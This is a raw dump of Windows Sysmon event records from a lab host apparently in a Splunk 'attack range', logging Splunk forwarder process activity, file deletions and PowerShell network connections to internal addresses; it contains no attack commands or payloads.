AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035341816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:56.774{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52344-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035341815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.493{B81B27B7-721F-613B-1DB4-03000000C801}37802788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-721F-613B-1DB4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-721F-613B-1DB4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.223{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-721F-613B-1DB4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:31.193{B81B27B7-721F-613B-1DB4-03000000C801}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035341837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:57.136{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52345-false10.0.1.12-8000- 10341000x800000000000000035341836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7220-613B-1FB4-03000000C801}624C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7220-613B-1FB4-03000000C801}624C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.622{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7220-613B-1FB4-03000000C801}624C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.607{B81B27B7-7220-613B-1FB4-03000000C801}624C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78BC5FD017512FEE61EFF362C7FB3129,SHA256=9B23A08BE135534744B96BC771B516EB94D86981B5E763D4ED6F0D6AE3CCA35C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70C11C234A474BE2D2327728BC27CFED,SHA256=2CB38DFFB9C80B91F7774F2472EDF2DB93E2DF6A81FB248F3184CEB23EE5946C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.091{B81B27B7-721F-613B-1EB4-03000000C801}57762120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:32.007{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2717249E4BCBE89EEFCE7319EEE2F071,SHA256=97F0E211902341D59C84FDBBDFDE70B688AD209B64552943A265097ECE4117A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:33.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78BC5FD017512FEE61EFF362C7FB3129,SHA256=9B23A08BE135534744B96BC771B516EB94D86981B5E763D4ED6F0D6AE3CCA35C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:33.021{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95BFA7D51E45E6FFC9BF64C6C6711633,SHA256=0DC25D8C716EEC6840BFF2926F5D6A0FD04CD9B4E8E3899A37B4E44F63B1CF85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:34.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3011EE06A51F1D9BF32C37EF6B4FCF,SHA256=FA0E492C8197BED4DE712C43D7BD1E3DC668237C782640A34E5F00B081604D97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:35.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2363E1AD1A8907D1B874B7641513CA77,SHA256=2A8BAF3FCA766AA6CD9A3C5E3769D9BC8924E2EA8EFB1EDAE88260C6B066C1E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:35.074{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F64092D8C585F5B5CF695E02C2EF1D4F,SHA256=837D6DCAD2F9600972E7DD7F54FFBAF456FD080BD2ADF94677AFE642D5A3EA1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:01.787{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52346-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:36.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BF47F109715E1023A00378F5CAE0212,SHA256=3A016728C3A813E2FADDCC3062554831B8D7276D3F9811C52244CD823BDFD105,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:37.102{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCEC9C172B95BFDF27551F182097AE6C,SHA256=A9266E5096BDF49EA225AC6DEC4FAADC4166F67B27BFF35BA39EC3B5C57D22A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:03.031{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52347-false10.0.1.12-8000- 23542300x800000000000000035341846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:38.133{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DD0323975F6EFFC3E4DCAE4A9C6850F,SHA256=96B8D1F04C3A9A6248494A3E80FCA7AC7FD209C1D7BC497AFE79688769E5459A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:39.154{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EC8A33534F5A758CAE529845A7F1189,SHA256=41653077078832E47CEC323A054062DE9662AC9749361E643B1031A48547B062,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:40.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94136AF97CFF201EA350AC62D85309A7,SHA256=F2CCB26E8A50F7D6E5D37590F7CEF4EBFF26792119D9B784BA9B32AE98440CC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:41.849{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C2FD9253ED9F420CDDD80E440DA372E2,SHA256=8B01D03E0FB68D7BEB949BA0A9E9B45654BC46EB1429706E73D8FE7F07516A76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:41.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=216A277549420745EA0BB36FB21FD409,SHA256=7C53EAF5896167C8DAD1E6F6DDAC856656F1429BE59BDEF9C0C38804A21F1379,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 